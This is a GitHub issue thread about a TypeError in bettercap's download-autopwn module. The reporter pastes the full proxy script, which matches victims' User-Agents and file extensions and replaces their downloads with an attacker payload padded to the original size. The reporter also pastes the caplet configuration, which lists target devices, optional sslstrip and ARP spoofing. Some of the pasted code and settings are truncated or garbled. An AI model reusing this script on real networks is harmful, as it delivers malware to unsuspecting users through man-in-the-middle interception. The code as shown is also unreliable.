
TypeError: Cannot access member 'toLowerCase' of undefined

LuckyFishGeek opened this issue · 8 comments

Description of the bug or feature request

Please provide:

Bettercap version you are using ( bettercap -version ).
bettercap v2.24.1 (built for linux amd64 with go1.11.6)

OS version and architecture you are using.
Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux

Steps to Reproduce

set downloadautopwn.devices android,windows

set Android
set Windows|WOW64
set apk,pdf,sh,pfx,zip
set exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip

set downloadautopwn.resizepayloads true

set http.proxy.script /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js

http.proxy on


Can you please paste the contents of /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js?

Can you please paste the contents of /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js?

thank you for your help

var targets = {}

var nullbyte = "\u0000"

var green   = "\033[32m",
    boldRed = "\033[1;31m",
    onRed   = "\033[41m",
    reset   = "\033[0m",
    redLine = "\n  " + onRed + " " + reset

function onLoad() {
	devices = env["downloadautopwn.devices"].split(",")
	logStr = ""
	for (var i = 0; i < devices.length; i++) {
		item = {
			"device": devices[i],
			"useragent": env[ "downloadautopwn.useragent." + devices[i] ],
			"extensions": env[ "downloadautopwn.extensions." + devices[i] ].toLowerCase().split(",")
		targets[i] = item
		logStr += "\n  " + green + targets[i]["device"] + reset +
		          "\n    User-Agent: " + targets[i]["useragent"] + 
		          "\n    Extensions: " + targets[i]["extensions"] + "\n"
	log("Download Autopwn loaded.\n\nDownload Autopwn targets: \n" + logStr)

function onResponse(req, res) {
	// First of all check whether the requested path might have an extension (to save cpu)
	var requestedFileName = req.Path.replace(/.*\//g, "")
	if ( requestedFileName.indexOf(".") != -1 ) {
		var userAgent = req.GetHeader("User-Agent", ""),
		// Iterate through targets
		for ( var t = 0; t < Object.keys(targets).length; t++ ) {
			// Check if User-Agent is a target
			regex = new RegExp(targets[t]["useragent"])
			if ( userAgent.match(regex) ) {
				// Iterate through target extensions
				for (var e = 0; e < targets[t]["extensions"].length; e++) {
					// Check if requested path contains a targeted extension
					// function endsWith() could be a nice simplification here
					if ( requestedFileName.replace(/.*\./g, "").toLowerCase() == targets[t]["extensions"][e] ) {
						extension = targets[t]["extensions"][e]
						// Autopwn
						logStr = "\n" + redLine + "  Autopwning download request from " + boldRed + req.Client.IP + reset + 
						         redLine + 
						         redLine + "  Found " + boldRed + extension.toUpperCase() + reset + " extension in " + boldRed + req.Hostname + req.Path + reset + 
						         redLine + 
						         redLine + "  Grabbing " + boldRed + targets[t]["device"].toUpperCase() + reset + " payload..."
						// Check our payload size
						payload = readFile("/usr/share/bettercap/caplets/download-autopwn/" + targets[t]["device"] + "/payload." + extension)
						payloadSize = payload.length
						logStr += redLine + "  The raw size of your payload is " + boldRed + payloadSize + reset + " bytes"
						// Append nullbytes to payload if resizing is enabled and if requested file is larger than payload
						if ( env["downloadautopwn.resizepayloads"] == "true" ) {
							// Check requested file size
							requestedFile = res.ReadBody()
							requestedFileSize = requestedFile.length
							logStr += redLine + "  The size of the requested file is " + boldRed + requestedFileSize + reset + " bytes"
							// Append nullbytes if required
							if (requestedFileSize > payloadSize) {
								logStr += redLine + "  Resizing your payload to " + boldRed + requestedFileSize + reset + " bytes..."
								sizeDifference = requestedFileSize - payloadSize
								nullbyteString = Array(sizeDifference + 1).join(nullbyte)
								payload += nullbyteString
						// Set Content-Disposition header to enforce file download instead of in-browser preview
						res.SetHeader("Content-Disposition", "attachment; filename=\"" + requestedFileName + "\"")
						// Update Content-Length header
						res.SetHeader("Content-Length", payload.length)
						logStr += redLine + 
						          redLine + "  Serving your payload to " + boldRed + req.Client.IP + reset + "...\n"
						res.Body = payload

@LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

@LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

I will try and submit the results to you.
Thank you again for your help.

@LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

Bettercap has no feedback when I download the test file (exe, zip, pdf...)

@LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

my download-autopwn.cap

`# documentation can be found at

this module lets you intercept very specific download requests and replaces the payload with one of your choice

in order for a download to get intercepted:

1. the victim's user-agent string must match the downloadautopwn.useragent.x regexp value

2. the requested file must match one of the downloadautopwn.extensions.x file extensions

you can find the downloadautopwn.devices in the download-autopwn/ folder (you can add your own)

choose the devices from which downloads get pwned (enter the dir names of choice from download-autopwn/)

(or feel free to add your own)

set downloadautopwn.devices android,ios,linux,macos,ps4,windows,xbox

choose the regexp value that the victim's User-Agent has to match

(feel free to add your own)

set Android
set downloadautopwn.useragent.ios iPad|iPhone|iPod
set downloadautopwn.useragent.linux Linux
set downloadautopwn.useragent.macos Intel Mac OS X 10_
set downloadautopwn.useragent.ps4 PlayStation 4
set Windows|WOW64
set Xbox

choose which file extensions get intercepted and replaced by your payload on specific devices (payloads are in download-autopwn/.../)

(again, you can add as many as you want)

make sure the payload files exist and that they are all named "payload" (for example: payload.exe)

set apk,pdf,sh,pfx,zip
set downloadautopwn.extensions.ios ipa,ios,ipb,ipsw,ipsx,ipcc,mobileconfig,pdf,zip
set downloadautopwn.extensions.linux c,go,sh,py,rb,cr,pl,deb,pdf,jar,zip
set downloadautopwn.extensions.macos app,dmg,doc,docx,jar,ai,ait,psd,pdf,c,go,sh,py,rb,pl,terminal,zip
set downloadautopwn.extensions.ps4 disc,pup,pdf,doc,docx,zip
set exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip
set exe,msi,jar,pdf,doc,docx,zip

choose whether the proxy module resizes your payload to the requested file's size (if not set then default=false)

set downloadautopwn.resizepayloads true

set download-autopwn.js as proxy script

set http.proxy.script /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js

uncomment if you want sslstrip enabled

set http.proxy.sslstrip true

start proxy

http.proxy on

wait for everything to start properly

sleep 1

uncomment if you want arp spoofing (make sure probing is off as it conflicts with arp spoofing)

arp.spoof on


There is also no indication of any requests getting intercepted. You should first confirm whether you can proxy HTTP traffic to begin with.

Closing because the issue with the caplet is resolved.